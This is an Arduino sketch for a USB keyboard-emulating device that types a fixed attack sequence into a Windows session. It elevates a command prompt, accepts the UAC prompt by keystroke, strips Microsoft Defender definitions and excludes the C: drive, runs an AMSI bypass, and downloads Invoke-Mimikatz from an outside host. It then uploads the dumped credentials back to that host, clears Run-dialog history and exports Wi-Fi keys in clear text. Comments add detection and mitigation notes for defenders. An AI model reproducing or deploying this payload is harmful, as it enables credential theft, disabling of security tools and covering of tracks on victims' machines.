#include <Keyboard.h>
#define KEY_DELAY 50 // milliseconds passed to delay() after key presses in setup(); sized for slow computers
// setup(): the whole keystroke sequence lives here, so it is typed once when the board starts.
//
// What the sketch is: a USB HID keystroke-injection payload. The board presents itself
// as a keyboard (German layout) and types a fixed list of commands into whatever Windows
// session has focus. In order, the typed commands request an elevated command prompt,
// try to weaken Microsoft Defender and AMSI, run a remotely hosted credential-dumping
// script and post its output back to the same host, clear the Run-dialog history, and
// export the stored Wi-Fi profiles. Nothing is read back from the host; the only pacing
// is the fixed delay() values.
//
// Why it matters to a defender: the host sees an ordinary keyboard, so the relevant
// controls are USB/HID device restrictions, locking unattended sessions, standard
// (non-admin) user accounts, Defender Tamper Protection, and command-line / PowerShell
// logging. The comments on each step below name the artefact that step leaves.
void setup() {
|
|
// Keyboard.begin();
|
|
// Initialise the HID keyboard with the German key map, so typed characters match a de_DE host.
Keyboard.begin(KeyboardLayout_de_DE);
|
|
// Start-up grace period: 20 seconds before anything is typed. The author recommends it
|
|
// while prototyping, so the board can be reprogrammed before it starts typing.
|
|
delay(20000);
|
|
|
|
// Main sequence; runs once at start-up.
|
|
|
|
// Windows + R opens the Run dialog. Whatever is typed there is stored under the
// RunMRU registry key that a later step deletes.
|
|
Keyboard.press(KEY_LEFT_GUI);
|
|
Keyboard.press('r');
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(700);
|
|
|
|
// Ask for an elevated cmd window via PowerShell's Start-Process -Verb runAs.
// Detection: process-creation logging with command lines enabled records this exact string.
|
|
Keyboard.println("powershell Start-Process cmd -Verb runAs");
|
|
delay(1500);
|
|
|
|
// ALT + j is sent to accept the elevation prompt; 'j' is presumably the accelerator of the
// German "Ja" button (matches the de_DE layout above) — confirm on a test host.
// Mitigation: a consent-only prompt can be accepted by a keystroke; a standard user
// account is asked for administrator credentials instead, which this sequence never types.
|
|
Keyboard.press(KEY_LEFT_ALT);
|
|
Keyboard.press('j');
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(1500);
|
|
|
|
// If UAC is not enabled there was no prompt, and the 'j' landed in the console instead.
|
|
// Two CTRL+C presses follow to cancel that input and return to
|
|
// a fresh prompt.
|
|
Keyboard.press(KEY_LEFT_CTRL);
|
|
Keyboard.press('c');
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(200);
|
|
|
|
Keyboard.press(KEY_LEFT_CTRL);
|
|
Keyboard.press('c');
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(300);
|
|
|
|
// Defender tampering, step 1: one typed line that names mpcmdrun.exe -RemoveDefinitions -All
// and Set-MpPreference -DisableOAVProtection. Author's timing note: the wait before this
// line was lengthened because at one point only `ershell ...` of a command arrived.
// Detection/mitigation: Defender's operational log records configuration changes
// (event 5007), and Tamper Protection is designed to block this class of change.
|
|
Keyboard.println("\"C:\\program files\\windows defender\\mpcmdrun.exe\" -RemoveDefinitions -All Set-MpPreference -DisableOAVProtection $true");
|
|
delay(200);
|
|
|
|
// Start an interactive PowerShell inside the cmd window; the author notes the OS needs
// time to bring another window to the foreground.
|
|
Keyboard.println("powershell");
|
|
delay(200);
|
|
|
|
// Defender tampering, step 2: adds the whole C: drive to the exclusion list.
// Detection: a drive-root exclusion is a high-signal change; alert on Add-MpPreference
// -ExclusionPath in command-line / script-block logs and audit existing exclusions.
|
|
Keyboard.println("Add-MpPreference -ExclusionPath \"C:\\\"");
|
|
delay(200);
|
|
|
|
// Types a line referencing System.Management.Automation.AmsiUtils and its amsiInitFailed
// field, the reflection pattern associated with AMSI tampering.
// Detection: these literal names are widely signatured and show up in PowerShell
// script-block logging (event 4104) where that logging is enabled.
Keyboard.println("\"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'.'NonPublic,Static').SetValue($null,$true)\"");
|
|
delay(200);
|
|
// Leave the interactive PowerShell and return to cmd.
Keyboard.println("exit");
|
|
delay(400);
|
|
|
|
// Fetches a script over plain HTTP with IEX + DownloadString, calls Invoke-Mimikatz -DumpCreds,
// and sends the output to a PHP endpoint on the same host with UploadString.
// Indicators on this line: host bor.oe7drt.com, paths /im.ps1 and /imrx.php, unencrypted HTTP.
// Mitigation: egress filtering / proxy inspection sees both requests in clear text;
// LSA protection and Credential Guard reduce what a credential dump can obtain.
|
|
Keyboard.println("powershell \"IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)\"");
|
|
delay(6000);
|
|
|
|
// Anti-forensics: deletes every value under the current user's Explorer RunMRU key, i.e.
// the Run-dialog history. Forensic note: this touches only that key; centrally collected
// process-creation and PowerShell logs are not affected by it.
|
|
Keyboard.println("powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue\"");
|
|
delay(400);
|
|
|
|
// Exports the stored Wi-Fi profiles with key=clear, i.e. with the keys in clear text.
// Forensic note: netsh writes one XML file per profile (into the working directory when no
// folder is given), so leftover profile XML files are an artefact of this step.
|
|
Keyboard.println("netsh wlan export profile key=clear");
|
|
delay(8000);
|
|
|
|
// Close the cmd window.
|
|
Keyboard.println("exit");
|
|
delay(KEY_DELAY);
|
|
|
|
// Stop keyboard emulation; nothing further is typed after this call.
Keyboard.end();
|
|
}
// loop(): intentionally empty. The whole sequence is typed from setup(), and this body
// contains no statements.
void loop() {
|
|
// Nothing is done here. The author's original note only muses about possible follow-up
|
|
// actions; none of them is implemented in this sketch.
|
|
}